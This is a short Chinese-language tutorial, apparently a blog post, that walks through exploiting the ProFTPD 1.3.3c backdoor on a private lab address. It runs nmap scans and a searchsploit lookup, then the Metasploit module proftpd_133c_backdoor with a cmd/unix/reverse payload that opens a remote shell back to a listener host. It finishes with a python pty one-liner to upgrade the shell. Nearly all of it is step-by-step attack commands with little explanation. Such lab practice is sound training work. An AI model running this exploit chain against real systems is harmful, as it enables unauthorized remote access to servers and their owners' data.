FTP后门

信息探测

扫描主机服务信息以及服务版本
nmap -sV 192.168.101.49

快速扫描主机全部信息
nmap -T4 -A -v 192.168.101.49

发现漏洞

使用seachsploit查找漏洞信息
seachsploit 服务版本信息

使用metasploit进行远程溢出

进入msfconsole
sudo msfconsole 

对版本漏洞进行搜索
search ProFTPd-1.3.3c

使用exploit
use exploit/unix/ftp/proftpd_133c_backdoor

查看可以使用的payload
show payload

设置payload
set payload cmd/unix/reverse 

查看设置参数 
show options

设置rhost
set rhost 192.168.101.49

设置lhost
set lhost 192.168.101.46

进行远程溢出
exploit

查看获得的权限
id

优化界面
python -c "import pty;pty.spawn('/bin/bash')"

你可能感兴趣的:(网络安全,web安全)